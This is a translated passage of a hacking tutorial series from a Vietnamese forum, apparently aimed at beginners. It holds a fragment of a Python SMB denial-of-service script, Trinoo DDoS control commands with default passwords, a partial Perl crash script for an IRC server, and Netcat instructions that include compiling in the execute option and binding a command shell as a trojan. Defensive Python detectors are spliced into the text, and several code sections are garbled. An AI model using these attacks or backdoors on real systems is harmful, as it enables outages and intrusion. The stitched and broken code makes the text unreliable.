    00 00 00 08 01 00 00 00 00 00 00 00 00 00 00 0000 00 00 08 f4 01 00 08 01 00 10 00 00 48 00 0000 48 00 00 00 00 00 00 00 00 00 00 00 00 00 4c00 48 00 4c 00 02 00 26 00 00 08 51 00 5c 50 4950 45 5c 00 00 00 05 00 0b 00 10 00 00 00 48 0000 00 01 00 00 00 30 16 30 16 00 00 00 00 01 0000 00 00 00 01 00 c8 4f 32 4b 70 16 d3 01 12 785a 47 bf 6e e1 88 03 00 00 00 04 5d 88 8a eb 1cc9 11 9f e8 08 00 2b 10 48 60 02 00 00 00``````,# SMBtrans Request``````ff 53 4d 42 25 0000 00 00 08 01 00 00 00 00 00 00 00 00 00 00 0000 00 00 08 f4 01 00 08 01 00 10 00 00 58 00 0000 58 00 00 00 00 00 00 00 00 00 00 00 00 00 4c00 58 00 4c 00 02 00 26 00 00 08 61 00 5c 50 4950 45 5c 00 00 00 05 00 00 03 10 00 00 00 58 0000 00 02 00 00 00 48 00 00 00 00 00 0f 00 01 0000 00 0d 00 00 00 00 00 00 00 0d 00 00 00 5c 005c 00 2a 00 53 00 4d 00 42 00 53 00 45 00 52 0056 00 45 00 52 00 00 00 00 00 01 00 00 00 01 0000 00 00 00 00 00 ff ff ff ff 00 00 00 00``````)crud = map(a2b, crud)def smb_send(sock, data, type=0, flags=0):d = struct.pack(`!BBH`, type, flags, len(data))#print `send:`, b2a(d+data)sock.send(d+data)def smb_recv(sock):s = sock.recv(4)assert(len(s) == 4)type, flags, length = struct.unpack(`!BBH`, s)

    data = sock.recv(length)assert(len(data) == length)#print `recv:`, b2a(s+data)return type, flags, datadef nbss_send(sock, data):sock.send(data)def nbss_recv(sock):s = sock.recv(4)assert(len(s) == 4)return sdef main(host, port=139):

    s = socket(AF_INET, SOCK_STREAM)s.connect(host, port)nbss_send(s, nbss_session)

    nbss_recv(s)for msg in crud[:-1]:smb_send(s, msg)smb_recv(s)smb_send(s, crud[-1]) # no response to thiss.close()

    if __name__ == `__main__`:print `Sending poison...`,main(sys.argv[1])

    print `done.`

    To be able to take down the opponent's server you need time to DoS; if you are not in a position to wait, it is best not to use this method. But tinkering with it just to know is fine, isn't it?

    Anhdenday
    HVA

    The most basic knowledge for becoming a Hacker - Part 7

    41 . ) DDoS attack via Trinoo :

    _ You already know what a DDoS attack is, right? A DDoS attack with Trinoo is carried out by the hacker connecting to the Trinoo Master and instructing the Master to launch a DDoS attack against one or more targets. The Trinoo Master then contacts the daemons and passes them the addresses to attack, against one or more targets for a set period of time.

    _ Both the Master and the Daemon are protected by a password. Only someone who knows the password can control them, which is no difficulty for their real owner. These passwords are usually encrypted, and you can set them when compiling Trinoo from source to binary. When run, the daemon displays a prompt and waits for the password to be entered; if the password is wrong it exits automatically, and if the password is correct it runs in the background of the system.

    attacker$ telnet 10.0.0.1 27665
    Trying 10.0.0.1
    Connected to 10.0.0.1
    Escape character is '^]'.
    kwijibo
    Connection closed by foreign host.      <== wrong password entered

    attacker$ telnet 10.0.0.1 27665
    Trying 10.0.0.1
    Connected to 10.0.0.1
    Escape character is '^]'.
    betaalmostdone
    trinoo v1.07d2+f3+c..[rpm8d/cb4Sx/]
    trinoo>                                 <== you are now in the trinoo system

    _ Here are some default passwords:

    "l44adsl": password of the trinoo daemon.
    "gorave": password of the trinoo master server at startup.
    "betaalmostdone": general remote-control password for the trinoo master.
    "killme": trinoo master password controlling the "mdie" command.

    _ Here are some commands used to control the master server:

    CODE
    die ------------ Shutdown.
    quit ----------- Log off.
    mtimer N ------- Set the duration of the DoS attack, with N taking a value from 1 --> 1999 seconds.
    dos IP --------- Attack a specified IP address.
    mdie pass ------ Disable all broadcasts, if the password is correct. A command ("d1e l44adsl") is sent to the broadcasts to shut them down. A separate password is set for this item.
    mping ---------- Send a ping command ("png l44adsl") to the broadcasts.
    mdos ----------- Send multiple DoS commands ("xyz l44adsl 123:ip1:ip2") to the broadcasts.
    info ----------- Display information about Trinoo.
    msize ---------- Set the buffer size for the packets sent during the DoS.
    nslookup host -- Determine the device name of the host on which the Trinoo master is running.
    usebackup ------ Switch to the backup broadcast file created by the killdead command.
    bcast ---------- List all the broadcasts that can be used.
    help [cmd] ----- Give the list of commands.
    mstop ---------- Stop the DoS attacks.

    _ Here are some commands used to control the Trinoo daemons:

    CODE
    aaa pass IP ----------- Attack the specified IP address. Sends UDP packets (0-65534) to the UDP ports of the specified IP address for a set period of time, 120 s by default or from 1 --> 1999 s.
    bbb pass N ------------ Set the time limit for the DoS attacks.
    shi pass -------------- Send the string *HELLO* to the list of master servers compiled into the program, on port 31335/UDP.
    png pass -------------- Send the string PONG to the master server that issued the control command, on port 31335/UDP.
    die pass -------------- Shut down Trinoo.
    rsz N ----------------- The size of the buffer used for the attack, in bytes.
    xyz pass 123:ip1:ip3 -- DoS attack on several targets at once.

    ( Based on the guide by Binhnx2000 )
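One way a defender can use the ports, strings and default daemon password listed above is to flag Trinoo control traffic in packet records. This is an added example, not part of the original article or of Trinoo itself; the record layout, the addresses and UDP port 40001 in the sample are constructed assumptions, and daemon commands are matched by payload shape rather than by port.

```python
import re
from collections import defaultdict

MASTER_TCP_PORT = 27665          # operator -> master (telnet session shown above)
MASTER_UDP_PORT = 31335          # daemon -> master (*HELLO* / PONG reports)
DEFAULT_DAEMON_PW = b"l44adsl"   # default daemon password listed above
# Daemon command names from the list above, followed by one argument token.
DAEMON_CMD = re.compile(rb"^(aaa|bbb|shi|png|d1e|die|rsz|xyz) (\S+)")

# Constructed records: (protocol, source, destination, destination port, payload).
SAMPLE = [
    ("tcp", "192.0.2.50", "10.0.0.1", 27665, b"betaalmostdone\n"),
    ("udp", "10.0.0.1", "10.0.7.12", 40001, b"png l44adsl"),
    ("udp", "10.0.7.12", "10.0.0.1", 31335, b"PONG"),
    ("udp", "10.0.7.13", "10.0.0.1", 31335, b"*HELLO*"),
    ("udp", "10.0.0.1", "10.0.7.13", 40001, b"aaa l44adsl 198.51.100.9"),
    ("udp", "10.0.3.3", "10.0.0.53", 53, b"\x12\x34\x01\x00"),        # benign DNS
    ("tcp", "10.0.3.3", "10.0.0.80", 80, b"GET / HTTP/1.0\r\n\r\n"),  # benign web
]

def classify(record):
    """Return (role, host, reason) findings for one packet record."""
    proto, src, dst, dport, payload = record
    if proto == "tcp" and dport == MASTER_TCP_PORT:
        return [("master", dst, "accepts control sessions on 27665/tcp"),
                ("operator", src, "connects to 27665/tcp")]
    report = payload.strip()
    if proto == "udp" and dport == MASTER_UDP_PORT and report in (b"*HELLO*", b"PONG"):
        return [("daemon", src, "reports %s to 31335/udp" % report.decode()),
                ("master", dst, "receives daemon reports on 31335/udp")]
    m = DAEMON_CMD.match(payload) if proto == "udp" else None
    if m:
        cmd = m.group(1).decode()
        pw = "default password" if m.group(2) == DEFAULT_DAEMON_PW else "non-default token"
        return [("daemon", dst, f"receives '{cmd}' command ({pw})"),
                ("master", src, f"sends '{cmd}' command")]
    return []

def suspects(records):
    """Group flagged hosts by role, keeping the reasons as evidence."""
    found = defaultdict(lambda: defaultdict(set))
    for rec in records:
        for role, host, reason in classify(rec):
            found[role][host].add(reason)
    return {role: {h: sorted(r) for h, r in hosts.items()}
            for role, hosts in found.items()}

if __name__ == "__main__":
    for role, hosts in suspects(SAMPLE).items():
        for host, reasons in hosts.items():
            print(role, host, "; ".join(reasons))
```

Hosts flagged as daemons are the compromised machines to isolate and rebuild; the master address is the next system to investigate.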

    There are many more pieces of code and ways of applying DoS; take the trouble to study further yourselves.

    But do not attack indiscriminately, least of all the HVA server; you may get no result and have your nick locked as well.

    End of part 6

    Anhdenday

    HVaonline.net

    The most basic knowledge for becoming a Hacker - Part 7 / 19-12-2004

    42 . ) DoS attack technique against WircSrv Irc Server v5.07 :

    _ WircSrv IRC is a common IRC server on the Internet. It crashes if a hacker sends a packet larger than the permitted size (65000 characters) to port 6667. You can do this by telnetting to WircSrv on port 6667:

    If you use Unix:

    [[email protected]$ telnet irc.example.com 6667
    Trying example.com...
    Connected to example.com.
    Escape character is '^]'.
    [buffer]

    Windows is similar:

    telnet irc.example.com 6667

    Note: [buffer] is a data packet corresponding to 65000 characters.
    However, we can crash it very simply with the following code (look at the code and work out for yourself what the statements in it do; this is also one of the ways hackers train their reflexes when they do research. Now, let us analyze it at a basic level):

    CODE#!/usr/bin/perl #< == on m ny cho ta bit l dng cho cc lnh trong perluse Getopt::Std;use Socket;getopts(`s:`, \%args);

    if(!defined($args{s})){&usage;}my($serv,$port,$foo,$number,$data,$buf,$in_addr,$p a ddr,$proto);$foo = ``A``; # y l NOP$number = ``65000``; # y l tt c s NOP$data .= $foo x $number; # kt qu ca $foo times $number$serv = $args{s}; # lnh iu khin server t xa$port = 6667; # lnh iu khin cng t xa , n c mc nh l 6667$buf = ``$data``;$in_addr = (gethostbyname($serv))[4]AnhdendayHVA

    The most basic knowledge for becoming a Hacker - Part 8

    47 . ) Tools needed to hack the Web :
    _ Professional hackers do not need these tools; they directly set up the version that the victim Web site uses on their own machine and test it for bugs. But for those new to the trade these tools are essential; use them a few times and you will learn how to combine them so that finding bugs on victim Web sites goes as quickly as possible. Below are some tools you need to have on your working machine:

    _ Tool 1 : A proxy used to hide your IP and get through firewalls when needed (I showed how to set up a proxy in part 7; please look back at it).

    _ Tool 2 : You need a shell account, which is really important. A good shell account is one that lets you run the main programs such as nslookup, host, dig, ping, traceroute, telnet, ssh, ftp,... and the shell account needs to have GCC installed (very important for compiling exploits written in C), like MinGW, Cygwin and other dev tools.
    A shell account is much like a DOS shell, but it has more commands and functions than DOS. Normally when you install Unix you get a shell account; if you do not install Unix, you should register for a free shell account online, or if someone has installed Unix and set up a shell account for you, you can log in with telnet (Start --> Run --> type Telnet) to use the shell account. Here are some addresses where you can register a free shell account:
    http://www.freedomshell.com/
    http://www.cyberspace.org/shell.html
    http://www.ultrashell.net/

    _ Tool 3 : NMAP is an extremely fast and powerful scanning tool. It can scan large networks and is especially good on single networks. NMAP lets you see which services are running on a server (services / ports : webserver, ftpserver, pop3,...), which operating system the server uses, what kind of firewall the servers use,... and has many other features. In general NMAP supports most scanning techniques, such as: ICMP (ping sweep), IP protocol, Null scan, TCP SYN (half open),... NMAP is rated the leading tool of hackers as well as network administrators around the world.
    For all information about NMAP see http://www.insecure.org/ .

    _ Tool 4 : Stealth HTTP Security Scanner is an excellent security vulnerability scanner on Win32. It can scan for more than 13000 security flaws and recognizes 5000 other exploits.

    _ Tool 5 : IntelliTamper is a tool that displays the structure of a Website, showing which directories and files it contains; it can list even directories and files that are password protected. Very handy for hacking a Website, because before you hack a Website you must gather some information about the admin and the Website.

    _ Tool 6 : Netcat is a tool for reading and writing data across the network over TCP or UDP. You can use Netcat directly or drive it from another script. Netcat is regarded as an exploitation tool because it can create a connection between you and the server for reading and writing data (provided, of course, that Netcat is installed on a vulnerable server). For all information about Netcat see http://www.l0pht.com/ .

    _ Tool 7 : Active Perl is a tool for reading Perl files with the *.pl extension, since exploits are usually written in Perl. It is also used to execute commands through *.pl files.

    _ Tool 8 : Linux is the operating system most hackers use.
    _ Tool 9 : L0phtCrack is the number-one tool for cracking Windows NT/2000 passwords.

    _ I have already shown how to download, so I will not cover it here. When downloading, pay attention to the versions: download and use the version with the highest number, because it will have features the earlier versions lack. If after downloading you do not know how to use a tool, look for the old posts with instructions in the Tools box. If you still cannot find them, just post a question and the others will answer you.

    48 . ) Guide to using Netcat :

    a . ) Introduction : Netcat is an indispensable tool if you want to hack a website, because it is very powerful and convenient. So you need to know a little about Netcat.

    b . ) Compiling :
    _ For the Linux version of Netcat, you must compile it before use.

    - edit the file netcat.c with vi: vi netcat.c
    + find the line res_init(); in main() and put two "/" in front of it: // res_init();
    + add the following two lines to the #define section (at the top of the file):

    #define GAPING_SECURITY_HOLE
    #define TELNET

    - compile: make linux
    - test run: ./nc -h
    - if you want to run Netcat as nc instead of ./nc, just edit the PATH environment variable in the file ~/.bashrc, adding ":."
    PATH=/sbin:/usr/sbin:...:.

    _ The Windows version of Netcat does not need compiling because the binary nc.exe is already provided. Just unpack it and run it.

    c . ) Netcat options :

    _ Netcat runs in command-line mode. Run nc -h to see the parameters:

    CODE
    C:\>nc -h
    connect to somewhere: nc [-options] hostname port [ports] ...
    listen for inbound: nc -l -p port [options] [hostname] [port]
    options:
    -d ----------- detach Netcat from the command window or console; Netcat runs in stealth mode (not shown on the Taskbar)
    -e prog ------ execute the program prog, usually used in listen mode
    -h ----------- show help
    -i secs ------ delay secs milliseconds before sending each line of data
    -l ----------- put Netcat into listen mode to wait for incoming connections
    -L ----------- force Netcat to listen "harder". It goes back to listening each time a connection is dropped.
    -n ----------- use only numeric IP addresses, such as 192.168.16.7; Netcat will not query DNS
    -o file ------ write a log to file
    -p port ------ specify the port
    -r ----------- ask Netcat to choose ports at random
    -s addr ------ spoof the source IP address as addr
    -t ----------- do not send extra information in a telnet session. When you telnet to a telnet daemon (telnetd), telnetd usually asks your telnet client to send it extra information such as the environment variables TERM and USER. If you use netcat with the -t option to telnet, netcat will not send this information to telnetd.
    -u ----------- use UDP (netcat uses TCP by default)
    -v ----------- show details about the current connection. -vv shows even more detail.
    -w secs ------ set the timeout for each connection to secs milliseconds
    -z ----------- zero I/O mode, usually used when scanning ports

    Netcat supports ranges of port numbers. The syntax is port1-port2. For example, 1-8080 means 1,2,3,..,8080

    d . ) Learning Netcat through examples :

    _ Grabbing the banner of a web server :

    For example: nc to 172.16.84.2, port 80
    CODE
    C:\>nc 172.16.84.2 80
    HEAD / HTTP/1.0            (press Enter twice here)
    HTTP/1.1 200 OK
    Date: Sat, 05 Feb 2000 20:51:37 GMT
    Server: Apache-AdvancedExtranetServer/1.3.19 (Linux-Mandrake/3mdk) mod_ssl/2.8.2 OpenSSL/0.9.6 PHP/4.0.4pl1
    Connection: close
    Content-Type: text/html

    To see details about the connection, you can use -v (-vv gives even more detail)

    C:\>nc -vv 172.16.84.1 80

    CODE
    172.16.84.1: inverse host lookup failed: h_errno 11004: NO_DATA
    (UNKNOWN) [172.16.84.1] 80 (?) open
    HEAD / HTTP/1.0
    HTTP/1.1 200 OK
    Date: Fri, 04 Feb 2000 14:46:43 GMT
    Server: Apache/1.3.20 (Win32)
    Last-Modified: Thu, 03 Feb 2000 20:54:02 GMT
    ETag: "0-cec-3899eaea"
    Accept-Ranges: bytes
    Content-Length: 3308
    Connection: close
    Content-Type: text/html
    sent 17, rcvd 245: NOTSOCK

    If you want to keep a log, use -o . For example:

    nc -vv -o nhat_ki.log 172.16.84.2 80

    Look at the file nhat_ki.log to see what it recorded:

    CODE
    < 00000000 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d # HTTP/1.1 200 OK.
    < 00000010 0a 44 61 74 65 3a 20 46 72 69 2c 20 30 34 20 46 # .Date: Fri, 04 F
    < 00000020 65 62 20 32 30 30 30 20 31 34 3a 35 30 3a 35 34 # eb 2000 14:50:54
    < 00000030 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 #  GMT..Server: Ap
    < 00000040 61 63 68 65 2f 31 2e 33 2e 32 30 20 28 57 69 6e # ache/1.3.20 (Win
    < 00000050 33 32 29 0d 0a 4c 61 73 74 2d 4d 6f 64 69 66 69 # 32)..Last-Modifi
    < 00000060 65 64 3a 20 54 68 75 2c 20 30 33 20 46 65 62 20 # ed: Thu, 03 Feb
    < 00000070 32 30 30 30 20 32 30 3a 35 34 3a 30 32 20 47 4d # 2000 20:54:02 GM
    < 00000080 54 0d 0a 45 54 61 67 3a 20 22 30 2d 63 65 63 2d # T..ETag: "0-cec-
    < 00000090 33 38 39 39 65 61 65 61 22 0d 0a 41 63 63 65 70 # 3899eaea"..Accep
    < 000000a0 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d # t-Ranges: bytes.
    < 000000b0 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a # .Content-Length:
    < 000000c0 20 33 33 30 38 0d 0a 43 6f 6e 6e 65 63 74 69 6f #  3308..Connectio
    < 000000d0 6e 3a 20 63 6c 6f 73 65 0d 0a 43 6f 6e 74 65 6e # n: close..Conten
    < 000000e0 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d # t-Type: text/htm
    < 000000f0 6c 0d 0a 0d 0a # l....

    the < sign means the server sent to netcat
    the > sign means netcat sent to the server
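The -o log can be turned back into the exact bytes exchanged, which is how an administrator checks what a server's banner gives away. The following is an added example, not part of the original article; the function names are illustrative, the "<" lines are the log shown above, the two ">" lines are constructed for the HEAD request, and offsets counted separately per direction are an assumption.

```python
import re

# One record: direction, 8-digit hex offset, up to 16 hex bytes, then "# ascii".
DUMP_LINE = re.compile(r"^([<>])\s+([0-9a-fA-F]{8})((?:\s+[0-9a-fA-F]{2}){1,16})\s+#")

SAMPLE = """\
> 00000000 48 45 41 44 20 2f 20 48 54 54 50 2f 31 2e 30 0a # HEAD / HTTP/1.0.
> 00000010 0a # .
< 00000000 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d # HTTP/1.1 200 OK.
< 00000010 0a 44 61 74 65 3a 20 46 72 69 2c 20 30 34 20 46 # .Date: Fri, 04 F
< 00000020 65 62 20 32 30 30 30 20 31 34 3a 35 30 3a 35 34 # eb 2000 14:50:54
< 00000030 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 #  GMT..Server: Ap
< 00000040 61 63 68 65 2f 31 2e 33 2e 32 30 20 28 57 69 6e # ache/1.3.20 (Win
< 00000050 33 32 29 0d 0a 4c 61 73 74 2d 4d 6f 64 69 66 69 # 32)..Last-Modifi
< 00000060 65 64 3a 20 54 68 75 2c 20 30 33 20 46 65 62 20 # ed: Thu, 03 Feb
< 00000070 32 30 30 30 20 32 30 3a 35 34 3a 30 32 20 47 4d # 2000 20:54:02 GM
< 00000080 54 0d 0a 45 54 61 67 3a 20 22 30 2d 63 65 63 2d # T..ETag: "0-cec-
< 00000090 33 38 39 39 65 61 65 61 22 0d 0a 41 63 63 65 70 # 3899eaea"..Accep
< 000000a0 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d # t-Ranges: bytes.
< 000000b0 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a # .Content-Length:
< 000000c0 20 33 33 30 38 0d 0a 43 6f 6e 6e 65 63 74 69 6f #  3308..Connectio
< 000000d0 6e 3a 20 63 6c 6f 73 65 0d 0a 43 6f 6e 74 65 6e # n: close..Conten
< 000000e0 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d # t-Type: text/htm
< 000000f0 6c 0d 0a 0d 0a # l....
"""

def parse_nc_dump(text):
    """Rebuild both byte streams from the hex column (the ASCII column is lossy)."""
    streams = {"<": bytearray(), ">": bytearray()}
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip():
            continue
        m = DUMP_LINE.match(line.strip())
        if m is None:
            raise ValueError(f"line {lineno}: not a netcat -o record")
        direction, offset, hexcol = m.groups()
        # Assumed per-direction offsets: a mismatch means a truncated or edited log.
        if int(offset, 16) != len(streams[direction]):
            raise ValueError(f"line {lineno}: offset gap in '{direction}' stream")
        streams[direction] += bytes.fromhex("".join(hexcol.split()))
    return {"received": bytes(streams["<"]), "sent": bytes(streams[">"])}

def response_headers(raw):
    """Split an HTTP response head into (status line, {lower-cased name: value})."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode("iso-8859-1")
    status, *lines = head.split("\r\n")
    headers = {}
    for line in lines:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return status, headers

def disclosed_versions(server_value):
    """Return the (product, version) pairs a Server header gives away."""
    return re.findall(r"([A-Za-z][\w\-]*)/(\d[\w.\-]*)", server_value)

if __name__ == "__main__":
    status, headers = response_headers(parse_nc_dump(SAMPLE)["received"])
    print(status, disclosed_versions(headers.get("server", "")))
```

Every pair returned by disclosed_versions is a version string the server publishes to anyone who connects; on Apache, ServerTokens Prod reduces the header to the product name alone.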

    _ Port scanning :
    Run netcat with the -z option. To scan ports faster, use -n so that netcat does not need to query DNS. For example, to scan the TCP ports (1 -> 500) of host 172.16.106.1:

    CODE
    [dt@vicki /]# nc -nvv -z 172.16.106.1 1-500
    (UNKNOWN) [172.16.106.1] 443 (?) open
    (UNKNOWN) [172.16.106.1] 139 (?) open
    (UNKNOWN) [172.16.106.1] 111 (?) open
    (UNKNOWN) [172.16.106.1] 80 (?) open
    (UNKNOWN) [172.16.106.1] 23 (?) open

    If you need to scan UDP ports, use -u

    CODE
    [dt@vicki /]# nc -u -nvv -z 172.16.106.1 1-500
    (UNKNOWN) [172.16.106.1] 1025 (?) open
    (UNKNOWN) [172.16.106.1] 1024 (?) open
    (UNKNOWN) [172.16.106.1] 138 (?) open
    (UNKNOWN) [172.16.106.1] 137 (?) open
    (UNKNOWN) [172.16.106.1] 123 (?) open
    (UNKNOWN) [172.16.106.1] 111 (?) open

    _ Turning Netcat into a trojan :
    On the victim's computer, you start netcat in listen mode, using the -l (listen) option and -p port to set the port number to listen on; -e asks netcat to execute a program when a connection arrives, usually the command shell cmd.exe (on NT) or /bin/sh (on Unix). For example:

    CODE
    E:\>nc -nvv -l -p 8080 -e cmd.exe
    listening on [any] 8080 ...
    connect to [172.16.84.1] from (UNKNOWN) [172.16.84.1] 3159
    sent 0, rcvd 0: unknown socket error

    On the computer used to attack, you simply use netcat to connect to the victim machine on the chosen port, for example 8080

    CODE
    C:\>nc -nvv 172.16.84.2 8080
    (UNKNOWN) [172.16.84.2] 8080 (?) open
    Microsoft Windows 2000 [Version 5.00.2195]
    (C) Copyright 1985-1999 Microsoft Corp.
    E:\>cd test
    cd test
    E:\test>dir /w
    dir /w
    Volume in drive E has no label.
    Volume ****** Number is B465-452F
    Directory of E:\test
    [.] [..] head.log NETUSERS.EXE NetView.exe
    ntcrash.zip password.txt pwdump.exe
    6 File(s) 262,499 bytes
    2 Dir(s) 191,488,000 bytes free
    C:\test>exit
    exit
    sent 20, rcvd 450: NOTSOCK

    Nh c